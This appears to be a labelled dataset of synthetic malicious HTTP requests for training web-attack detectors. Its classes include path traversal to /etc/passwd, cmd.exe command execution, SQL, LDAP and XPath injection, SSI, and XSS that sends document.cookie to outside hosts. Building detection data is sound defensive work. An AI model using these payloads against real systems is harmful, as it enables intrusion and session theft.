GET /3NOWUZdzlt@Q/iyTf/t.VauI4/cXzN5gSusr/jSXk/a4-IvblNQY9I.css?bezirieeI=spoieo&lomsyetsrw=Doweth&SESchl=y2gQFxZ21&tneuletq8eN=ite&trtZin=0t+5%27w%3Aaeznso+Zt&O8FSego=0097262&ldsyDa=mitmoeeae&ishAsen=P5llfnscript%7C%3Bprocessing-instructionmaoOuorsno&aswent8NePA=37042&URmwp-zSL2xtermA=42%29%28%26%28objectClass%3Dadre%29%28%7C%28sn++%3Dr2r1%29%28cn%3Dadst+++J*%29%29&to4eblf=95&tg5iftc=sknetcatz&9nhyejnroT=6398 HTTP/1.0
Host: www.HhofO.org
Connection: 7j9ts
Accept: */*;q=0.0
Accept-Charset: shift_jis;q=0.4, x-mac-arabic, x-mac-korean;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: 2tk-rnxeG;q=0.8, qnn-eesf4er;q=0.8, ynipn-aaoa1us;q=0.4, hiR-dr, n-qhl2N6
Cache-Control: only-if-cached
Client-ip: 245.129.164.208
Cookie: a5ncwnst=no;rlu32wieyoneetj=noa;r1t= uhtmpeoncdre
Cookie2: $Version="76"
Date: Mon, 26 May 08 11:32:08 GMT
ETag: "E_B0S7tw9Ro6ZIgJ"
Expect: el5e=GntnhEqt
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 15 Sep 09 20:04:22 CET
If-Unmodified-Since: Mon, 27 Apr 09 01:33:24 CET
If-Match: *
If-None-Match: *
If-Range: "Zq92KHqjhBsQQbWzz9T"
Max-Forwards: 04
MIME-Version: 8.8
Pragma: aawtrk=3onoepas
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest uri=http://Rdco.org/uaTto/dIpns.pdf
Range: 5217-69596,5-
Referer: /yAhS/ajlwr.php
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 0.8; qE-or; rv:5.7.6) Gecko/84225043
UA-CPU: MIPS
UA-Disp: 879,787,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 2.3 www.sr9aepne.shtml, FTP/1.8 245.214.53.113, 5.8 25.40.215.110
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 864 185.80.26.144 "Nciqesnma5Srctnr" "Wed, 25 Nov 09 18:45:33 UTC"
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38041
Start - Id: 46105
class: PathTransversal
PUT /saohsdnxidj/bZ/nr19isOtQC7q_QuF/eyrnt/cga.nsf? HTTP/1.0
Content-Length: 44
Content-Language: ieytO,qlstrr,ftu
Content-Encoding: compress
Content-Location: /oseSre/eee34rt/tnnatbeA.asp
Content-MD5: dG1vbWRtYW5haVRjbW5sdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Jul 09 17:14:25 CET
Last-Modified: Tue, 06 May 08 15:40:14 UTC
Host: 78.121.75.189:80
Connection: close
Accept: video/quicktime, text/*, text/plain;q=0.3
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-15;q=0.6, utf-8, x-mac-chinesesimp;q=0.3
Accept-Encoding: deflate;q=0.8, gzip, compress, gzip;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 78.173.68.149
Cookie: LCphpSounionKopenqJ=309;rn=tUeXyVt7X;0eeataoqa=nodei0a51-ttls3+twtPn;y7ieITlq1ltydt=d;lensosnl4n8udn=s;tCZnm.yU==D;
Cookie2: $Version="6"
Date: Tue, 08 Jan 08 21:46:54 CET
ETag: W/"RQOwSVWoeJGj0tXwiO"
Expect: rXsedfef
From: ovnitL@umeod.net
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Mon, 16 Oct 06 18:24:27 CET
If-Match: "2p9_frFJ2YcaJJHmeX"
If-None-Match: *
If-Range: *
Max-Forwards: 260
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: Digest uri=http://www.wuCi.uk/Ab4jhqe/loemhf/deenLse/6tobu.php
Range: -03018,-4474
Referer: /nent/1sw8mhiu/Sigxtjn/nfenc/gSe4n78g.pdf
TE: chunked;q=0.0,chunked,trailers
Trailer: Connection
User-Agent: acslmscdjH (sJN8uaohR; deK021Rig; tdOFIT_m)
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: vecj/8.8, yebd/9.0, jn0/6.9, OasdIr/4.2
Warning: 607 42.242.50.182 "p8wLrga" "Tue, 06 Dec 05 03:24:33 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ahqtilnc5trwnie=/etc/passwd&qAqs=4171565

End - Id: 46105
Start - Id: 48709
class: XPathInjection
PUT /ophEWlEwbd2Vko/varvnczhriframedLJtmpUj/m_H/e_hGL6-x/ow/sj@W3bIm5j8vWb/mj2B.jpeg? HTTP/1.0
Content-Length: 173
Content-Language: gto84wre,eae
Content-Encoding: identity
Content-Location: http://www.teeiz.com/f47tgnsa.aspx
Content-Type: application/x-www-form-urlencoded
Host: 227.52.45.90
Connection: iysgeDA
Accept: */*;q=0.5
Accept-Charset: x-mac-japanese;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: 61sise=aaaOr
Cookie2: $Version="63"
Date: Sat, 29 Sep 07 06:18:54 CET
From: 0Czsri@otpu.uk
If-Modified-Since: Sun, 21 Aug 05 02:50:49 UTC
If-Range: Thu, 25 Dec 08 09:05:04 UTC
Max-Forwards: 2
Pragma: no-cache
Range: -4,59993-18,28-7301
Referer: /nworip.wmn
TE: trailers,gzip
User-Agent: cShnih7lSiieprnw1no
UA-Pixels: 181x2087
Upgrade: aer/1.4, ieE/6.5, hbq/3.1
X-Serial-Number: 586508390592927979

Ewly=uTF0o0'  or     6 <  count(path/child::*)    or   'abwolo'   =    '&tynen2i=tMCCNQZ5.UK&pihdLa=nStxJc&XtelnetYFcCuw=@&Hee5kaau=luqzvarmmailaf|

End - Id: 48709
Start - Id: 40781
class: SSI
GET /_49BBMd_/tHY0ufBmx75kJFTYsD/eo/l2dsoel9rni1hy.jpeg?wws3wo=%3C%21--++++%23odbc++connect%3D%22i0oig%2Ct6o%2Ciat%22++++++++statement%3D%22select+++++*+++++from+ebs%22--%3E HTTP/1.1
Host: www.sroeee.org:80
Connection: grhoL
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: het-Ssahtd1x, qh-UsUOt, eaupk1o-xrEl;q=0.0, xgnaena-3Y, ie38adn-a7irtda;q=0.4
Client-ip: 78.148.170.246
Cookie: cxgzeocnEe1v7rf=sh 5vrnadAs7snd;rmerUdies7i=?;GsrdsvEh1ca=hstety;tsirnEinm=108;hrP=12602782
Date: Mon, 26 Oct 09 19:10:21 UTC
ETag: "g8BPUE.bYxda8s-n2"
If-Modified-Since: Sun, 07 Mar 04 02:47:18 GMT
If-Unmodified-Since: Mon, 23 Aug 04 19:05:01 GMT
If-None-Match: *
If-Range: Sun, 25 May 08 10:19:32 GMT
Max-Forwards: 614
Pragma: no-cache
Proxy-Authorization: Basic bmVoc2o6bDlxb2FsdA==
Authorization: soiar claevnEa=1tw4
Range: 317784-4,80-130,625-44564
Referer: /qTlufo7/ainhezss.doc
TE: trailers
User-Agent: Mozilla/1.6 (Windows; U; Win 9x 3.7; qs-ot; rv:6.8.4) Gecko/77874222
UA-Pixels: 593x4712
Via: 6.3 www.2nzldi.tiff, HTTP/8.2 21.126.76.87:8
Transfer-Encoding: gzip
Upgrade: vgs/0.3
X-Serial-Number: 87018152344
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40781
Start - Id: 50034
class: XPathInjection
POST /aofiXLOO/s2a/ue7eIgnaDegeylqb0/dzYanZiunvUHOKFEp/aahxsvhuGpshsy/r13atmwegnSnei/thsm/Eahsn/varKXb3FL7ymdocumentcj/sh5aenhm1smfhGa.jsp? HTTP/1.0
Content-Length: 278
Content-Language: hpnn,ue
Content-Encoding: compress
Content-Location: /j6oye/xzcnt/mtrftf/ss31.mdb
Content-MD5: aUlkNk9vZlJyYWZuYWlvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Oct 05 07:55:27 GMT
Last-Modified: Thu, 10 Jan 08 14:04:04 CET
Host: 174.211.2.205
Connection: close
Accept: text/*, text/xml, video/*
Accept-Charset: x-mac-chinesetrad;q=0.8, x-mac-chinesetrad
Accept-Encoding: 37438   or    aieC/0o/a/child::node()[position()=944]  or    2=
Accept-Language: oaxrChOa-Eurlnja8, eM3a-emsa1
Cache-Control: no-transform
Client-ip: 80.186.16.60
Cookie: ft9=w;nsue5dt=8059;oovc=nLR3v0cUCBHB
Cookie2: $Version="17"
Date: Thu, 30 Oct 08 09:39:35 CET
Expect: 100-continue
From: vhmmsH@tdoi.it
If-Modified-Since: Wed, 22 Jun 05 03:00:35 GMT
If-Unmodified-Since: Wed, 27 Dec 06 11:21:59 UTC
If-Match: *
If-None-Match: "-1SU6_lihgwG3XnHFTzL"
If-Range: "mA@xggY9HjojAEmC_Oy"
Max-Forwards: 057
MIME-Version: 6.7
Pragma: no-cache
Authorization: NTLM cXplaGZtZGRvcHByOHRScXNuc2lhZ2VhMHQ4Q3pzaDVuN0VhcnJ5bWlu
Range: 889369-5,11-482972
Referer: http://rfl1noaj.st/o79quhzz/ktr7gn/rarheRn/RaOmtt/dapt.jsp
TE: trailers
User-Agent: iim7Siytos (gp@UidjZl; l.GJMq)
UA-Pixels: 793x7153
Via: 3.5 116.246.96.157
Transfer-Encoding: deflate
Upgrade: et9sce/9.2, quccwr/8.8, 3xceD6/4.5
Warning: 601 www.Dn0amett.shtml "dantsuss5ePa" 
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

nxatotnancnhZ=wl&raUr7antEissa=b sex@iapRlc7&pC9e5tm=1&udlt=a3h&enoiuoTsup=herl&5c1ukBL4xW-=l]d&tf6eXeEoiels3=jreasic nd6uss[&zlbaeyq=46605555&tiaetct6t= 4irallosinaedrr&2Pme10C5xdqD=varn1|ejgaonaael&bdl0otmnevzvrI=9519949789&obudpkylaalt8ht=rhifKEK_5IM&i2RqfERh7Ei=mXSS

End - Id: 50034
Start - Id: 48439
class: XPathInjection
GET /imNrFL1jgjoEr19epe90/r2ta6t/Rt_bh2w2Ewindow.open2/lZsyglearnrexth/NNG4Jwhere.LXwindow.open26j/ei0yv6os9ctirih/k0mgkzL6LkU9lMzg/HM/sopHcuB1.js?cajeagomriu=oMcLi8Llh2xx&botuiscaors=ir5Dr9+%3Af4hbetelocationls&esmeue1e=erdisdNehttps%27eha+tf2Nnu&moIgah=aRw0oJVd1. HTTP/1.1
Host: 243.58.149.163
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, identity
Accept-Language: eooSnc-see;q=0.5, eh-eun;q=0.3
Cache-Control: max-age=96
Client-ip: 160.236.211.26
Cookie: eutezimeanp=oNTSzWjfJVy;rRXELVQX84=+o2o-;toytlet=toaNasr'     or     count(   path/child::node()[position()=(( i+ j +    k  +    l   + 1)]  |    path/child::*()[position()=(k+1)])=1     or   'a5'  = '    9itp'     or;lose=pVrKwHZMS;Enclqa8=eidoszLseotc;brhwao=ie
Cookie2: $Version="8"
Date: Wed, 01 Dec 04 24:41:39 GMT
ETag: "QF5oOBRPWk@R1BG"
Expect: 100-continue
From: tzeeyyn@tbckkmdmi.st
If-Modified-Since: Sun, 16 May 04 12:21:06 UTC
If-Unmodified-Since: Thu, 08 Nov 07 19:03:46 GMT
If-Match: "diZRjtZ4fRByBvL-6j"
If-None-Match: "ucJsSH8Ayjn-hTo"
If-Range: "kyciFv6hVGXUaOiy"
Max-Forwards: 02
MIME-Version: 9.5
Pragma: tu='sofRor'
Proxy-Authorization: csh5 e7oha=vom3a6n0
Authorization: Digest algorithm=MD5
Range: 186-,6-730
Referer: /oaclia.css
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 7.8; hm-th; rv:7.2.4) Gecko/81542836
UA-Disp: 167,4504,32
UA-OS: Win95
UA-Pixels: 8951x179
Via: FTP/4.4 90.136.123.132, 3.3 213.183.190.167
Transfer-Encoding: identity
Upgrade: On7s/8.1, tyoz/0.4, mssy/6.5, iod/0.2, tor/9.7
Warning: 810 www.r8tfa.html "9eupeieelbhiq8etsrA" 
X-Forwarded-For: 152.33.64.46
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48439
Start - Id: 36515
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 96.146.219.226:80
Connection: keep-alive
Accept: video/mpeg, image/*;q=0.5
Accept-Charset: koi8-r;q=0.9
Accept-Encoding: 
Accept-Language: nEduss-holxhNoa;q=0.7, cabr7tk-H, anIenc-iseyd
Cache-Control: min-fresh=99
Client-ip: 138.104.69.2
Cookie: rseYe4wssoes=ek2;xiei=dewget%eo;EhavingVBwKT.W=raXtK
Cookie2: $Version="50"
Date: Wed, 03 Sep 08 02:35:44 UTC
ETag: "82ovRcbDriA.HwZ_bLf"
Expect: 100-continue
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Sat, 23 Jul 05 07:12:40 CET
If-Match: *
If-None-Match: "Byw_kMDmR6jh@NH"
If-Range: *
Max-Forwards: 0
MIME-Version: 8.5
Pragma: siEi='RzaTNnn'
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: iSgy wib3ibfl=t0An8k
Range: 17-
Referer: http://www.Toiqt.cz/ati4h2m/GorusstU/b1henpup.dll
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: 3susi/1.2
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/2.3 www.hc4s.css:52, 7.8 www.isetla.png
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 015 49.255.222.156 "ltge" "Mon, 28 Nov 05 13:36:16 GMT"
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36515
Start - Id: 47245
class: XSS
GET /cWXML_xxLBL4Gkx/yi3lemdeta/iertoa29/e8dHeLPoxlo3ub/g8.cgi?AQnF4u=0eetoeggnfd&hZidEWV_perl7EnH=%3Cdiv+style+%3D++%22+++behaviour%3A+++++url%28%5Bhttp%3A%2F%2Fwww.aronto.com%2Fscript%2FnedidVload.aspx%5D%29%3B%22++%3E HTTP/1.1
Host: www.ncUrea.fr
Connection: close
Accept: text/*;q=0.1
Accept-Charset: windows-1257;q=0.4, x-mac-chinesesimp, x-mac-chinesesimp;q=0.5, cp-950;q=0.6, windows-1255
Accept-Encoding: *
Accept-Language: ru-1m7wbobP, ihh-hruat;q=0.6, TrA-rzro1;q=0.3
Cache-Control: no-transform
Client-ip: 190.120.113.241
Cookie: 2o2tmerAhO=914;al8U=dglam|home3dlfeO99
Cookie2: $Version="66"
Date: Sun, 20 Feb 05 11:52:55 UTC
ETag: "WAB5@Z.yDarnU0JFvhk"
Expect: ltaUwimt=sm2Reitr
From: eeTaCo@mVlE3nKhn.biz
If-Modified-Since: Sun, 25 Apr 04 17:39:28 GMT
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: "k@2qDpaBPx4@wdb7ATHn"
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 503
MIME-Version: 8.0
Pragma: hoy=ro
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -3
Referer: /h3eeens/cpAegyaH.txt
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: fAcE/1.0.0
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/1.1 112.223.231.15, naia/7.1 209.9.53.118
Transfer-Encoding: 1Ohs; anmlaA=sctE
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 47.247.175.175
X-Serial-Number: 15152704800
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47245
Start - Id: 46095
class: PathTransversal
POST /e2C@7/tfwZlENfC3bLaMKx/ixtrzsvSBobetween/NreplacehavingcZ/s5L8nx/iqXVclRbPS/sC.gif? HTTP/1.1
Content-Length: 72
Content-Language: tisr,miiei5p,ojhnsc4
Content-Encoding: gzip
Content-Location: http://www.sra8.cz/abed.sh
Content-MD5: bm8xb3Qyb2VndGlzbXRiMg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Feb 08 14:43:07 GMT
Last-Modified: Wed, 25 Jun 08 02:14:13 CET
Host: www.ioKtmre7.be:80
Connection: rRciAnmk
Accept: */*;q=0.9
Accept-Charset: windows-1251, iso-8859-8
Accept-Encoding: deflate, gzip;q=0.0, deflate;q=0.7, deflate
Accept-Language: dcoEet-Boiv;q=0.1, eA-teo;q=0.5, aiihueL-n, 1ed8lte-e;q=0.4, oz8a-oairnsth;q=0.5
Cache-Control: max-stale
Client-ip: 92.99.137.196
Cookie: 4e7=ayDv;saardirdr=etsh;tbE5ofoswql=7
Cookie2: $Version="0"
Date: Thu, 19 Oct 06 18:16:13 GMT
ETag: W/"TbF8453pah_RFw4TC"
Expect: 1riwi
If-Modified-Since: Sun, 02 May 04 14:06:45 UTC
If-Unmodified-Since: Thu, 23 Jul 09 21:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: ".K5SgDfV0JkuNSNbf_g"
Max-Forwards: 8374
MIME-Version: 4.9
Pragma: rthecb=o35
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: NTLM YXBzZWlhN29nMmVzbWZyaVRvaWxtZUFob3l0SW5zckNuTVRvNnhFc3R0
Referer: /5eie/eyoesl/nee4o7/ydoTn.sh
TE: trailers,deflate;q=0.8
Trailer: Trailer
User-Agent: Mozilla/9.8 (compatible; MSIE 1.7; Linux i386; mecoa6r)
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: hsde
Warning: 725 2.115.234.163 "nhM0estysig8nhena" "Sat, 25 Mar 06 01:22:22 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 2944853437474808698
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

atwwwAeeTiw=\.\.\/\.\.\/etc\/baeg.conf&PVbcOXTu=i$

End - Id: 46095
Start - Id: 40950
class: SSI
GET /HJfDHoh-S3divMqy/geDjlibiotni7s.tiff?d5enn=0&lmeearexyrouue=ajimg9tiNiaso%24yTpSaincludet&a22hoisu7aetits=aatzalu&gnyXngc=tli&iGsft8=sAcaeek1e0txs9s&oaensiu=86422904&g6p8aIsefasnnP=%3C%21--++%23odbc+connect%3D%22se%2Cua6ca%2Crucl%22+++++++statement%3D%22select++++*+++from+i%22--%3E&_1dBscmdC7EAeE=yw HTTP/1.1
Host: 81.242.236.96
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: utf-8;q=0.0
Client-ip: 47.7.241.162
Date: Thu, 13 Jul 06 12:16:54 GMT
Max-Forwards: 5191
Referer: http://www.isot.st/6slfw/r8atoi/UuiErh/wlybD2e.fgf
TE: trailers,trailers
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 8.2; Da-ts; rv:2.1.6) Gecko/97837173
Transfer-Encoding: gzip

null

End - Id: 40950
Start - Id: 47039
class: XSS
GET /olecehtlteyeTwl/ebFbIfr51.dusK9_T/ifuywisr5dtp/ttaaaHhnrhJhomi9zal/lyiMi2qsmtSyp12/eeetnyooe1bTefozsao/docPaH9BC4nf/dcpYAZGy/bkd-svFq8ITIHSsTc5/Chtdebe/YZ8as.swf?NoeeaztloTme=58&yAk=00dJG&olIft8jrnteo3ia=s&kycjl8ook3=nnnr4len&5nc=dnnkzuin+ordWtw&lo=296264&stuasehPxu=nwuP1&bemal=0475668&eas=aX1&cten9tv5mrs=1049597013&ewtMitia=wd%3Ccopy+&rne7estdW=8En&ne=ae0qoseedsteoc5&q1zj8=09263&WIvbscriptXP=%3Cimg+++++src++%3D%22livescript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ieneelal.com%2Fcgi-bin%2Fan.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E HTTP/1.1
Host: 64.97.75.171
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.0, utf-8
Accept-Encoding: 
Accept-Language: ei9-u3lihjn;q=0.5
Cache-Control: no-cache
Client-ip: 71.223.100.67
Cookie: rtriiIlns=x4;odot=nhkq)'cv\hvi;etrHr=bcxHCe4B_8z;aoi=27;sjme1=5O2FT_xwpS
Cookie2: $Version="52"
Date: Tue, 30 Oct 07 15:58:28 CET
ETag: W/"JuHxQWjnWQYZ_sTjN"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Fri, 16 Apr 04 17:49:42 UTC
If-Unmodified-Since: Thu, 16 Nov 06 09:26:28 UTC
If-Match: "aBAcKv@sS9X62VDHfgrH"
If-None-Match: *
If-Range: "d8zBZtD9r-Kt1cAB4fN"
Max-Forwards: 0721
MIME-Version: 5.6
Pragma: df='h'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: Digest algorithm=MD5
Range: -00740,898979-,21-
Referer: http://www.rdnt.uk/osjsa/nomhs/rraM/dazfh/rtaoa.ace
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: stiyfav (rCjPSF4E; oGv9C-6b-q; elc4me; t09eWG; hN70tv)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: 5.3 www.ekpaeiw.png, 8.5 228.221.200.118, 5.6 58.199.120.0
Transfer-Encoding: n6ea
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 182 www.tsTbr1.png "pkoij" "Thu, 09 Feb 06 08:59:39 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47039
Start - Id: 47954
class: XSS
GET /t5XhVj4DALaMKI/g0plour/bLpuW8w7Yshs/aWh2GT8ND/nb33l/OMeEz/rrerileT/hEt748uf/afg2pNG.js?exXdcopyVlikeJg=vesr&ehoeuun1oghe=%3Cbody+++onload++%3D+%22++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.anra.com%2Fcgi-bin%2Fallatien.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E&Ib1io=nudefudolijedssee&tf7dc=03629&.udivgXEoM9=ic%2Bu%7Ci&eihmsma=o5Y&7qa8w8fbja=lKAqwvNx&qweHWue0tdayret=drop%5Cotkr%7Ezra&rNsteaeocfta=yyerh8ls-rUrets&hseun=o6&7%uk14iframewherecXWdD=1BOOXba54AJz&e1t7Ednanhem1=rim&agmerxte=hoeht&HppositionL-6=0&lpBt=535981794 HTTP/1.0
Host: 182.45.109.37
Connection: close
Accept: */*
Accept-Charset: euc-tw
Accept-Encoding: gzip, identity;q=0.0, gzip, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 120.235.185.123
Cookie: ln=ent;en=a dNaaihuybfD;1scriptQjC8eB=:b
Cookie2: $Version="803"
Date: Fri, 04 Nov 05 02:46:05 UTC
ETag: "WEVlnkxAx84k3BG8N5"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Fri, 13 Aug 04 17:24:36 CET
If-Unmodified-Since: Wed, 20 Jun 07 09:51:48 GMT
If-Match: *
If-None-Match: "CRiilMO@fXgIVomv"
If-Range: *
Max-Forwards: 239
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: hSoia5 ulkateil=eoAtf
Range: -162,92-
Referer: /aj2v.fgf
TE: trailers,trailers
Trailer: Date
User-Agent: omrghcef (2x6t4a-KG-; tNs@d5Lx; eQiYy7_t; aOiG_vfp; cD@lwjuX4w)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3364x532
Via: 6.4 168.161.41.247, HTTP/0.7 www.ctiash3E.gif, 8m5e/3.0 16.75.192.106
Transfer-Encoding: deflate
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47954
Start - Id: 36984
class: LdapInjection
GET /ttmNnro4ddioytfr.bin?eoq1g5yhrhngiwe=85&3bt6Hscl4=seol8gfdfs4kMhb&R6nrido=460&8el7ha6hmot=%29%28%7C%28++++cn%3D*o+%27brien*++%29%28mail+%3D*o+++%27brien*+++%29++++&nnyrtlcsBezks=95 HTTP/1.0
Host: www.a7df.com:089
Connection: close
Accept: text/html;q=0.7, image/*;q=0.4, image/png
Accept-Charset: x-mac-roman, iso-8859-8;q=0.2, iso-8859-15;q=0.2, x-mac-arabic, us-ascii
Accept-Encoding: 
Accept-Language: m-iinazt
Cache-Control: min-fresh=63579
Client-ip: 206.238.216.53
Cookie: imscriptO21YtCH-=g
Cookie2: $Version="967"
Date: Thu, 17 Feb 05 02:06:09 UTC
ETag: W/"b3wJsWqNGTEe1_j"
Expect: 100-continue
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Thu, 23 Dec 04 01:47:36 GMT
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 09 May 06 04:27:01 GMT
Max-Forwards: 0366
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic YVJlcnpkOnRkY2JoZA==
Range: 84-,-422477,1197-5319
Referer: /eiloo/7atvor/pcpon/yaoisE.php4
TE: deflate,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/9.9 (compatible; MSIE 2.0; Mac OS X; Uh9sMw; seveeme)
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: 3.2 www.onermn1l.png:2294
Transfer-Encoding: compress
Upgrade: m2cnia/0.2, h1ebb/7.9
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 159.94.130.144
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36984
Start - Id: 41210
class: SqlInjection
GET /yenrl3NeiRsaeeove/ty3e_MH1uugw/thse1eximrm/AVbaccess_log_J-acceptperlX./Ti/P_X.qu/aWBT7GKz7gGtv/ftpCnc7mail6hEgkoua/t56nzoMkN-w725DsbP.msf?Fos=eirbyo&sus21t=yr5t&liinhT=+udy+&nn-Jb5Dobject4Yd=966773&ai=gC8Ld4&ae=d7mMrd7zU&0ne0bI=r_b7qr&d2uooebo6jyo0=hnon&b8PNPurY5o=84067054&ptn9w=qrejaeshci8&ZeexFK6=c5bnaosrovh&ahetlo31mu=%7Ee%24%3Fhttp&k71LL=teohntaerahiphohap&Br=iaheo6ivnuokUhiw&oCO5=Aos6ot6ioa HTTP/1.1
Host: www.2SatE8t.net
Connection: close
Accept: application/*;q=0.1, audio/basic;q=0.6, image/*
Accept-Charset: windows-1257;q=0.7, x-mac-hebrew, isiri-3342, isiri-3342;q=0.3
Accept-Encoding: ') UNION    ALL    SELECT   xoitfE     FROM   rlaryonTny   WHERE  (   ''   ='
Accept-Language: *
Cache-Control: no-transform
Client-ip: 226.194.101.187
Cookie: 3hnchild0include=&;ntadTsdeXntxhx=4457536;det1neii0=Ewinnt;86ia=e5oirghr
Cookie2: $Version="19"
Date: Mon, 19 Feb 07 23:22:32 GMT
ETag: W/"dL-DhQG3mf0HuKs"
Expect: 0LbSwo
From: ljOoeae@dayLl.cz
If-Modified-Since: Mon, 20 Jul 09 09:07:43 CET
If-Unmodified-Since: Mon, 14 Jan 08 05:06:08 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 31 Jul 07 08:17:54 UTC
Max-Forwards: 17
MIME-Version: 5.2
Pragma: eae7=lS7
Proxy-Authorization: muisi doaouyba=onhfte
Authorization: aEuSo 9dhabosO=esng
Range: 870-,33722-,80-34
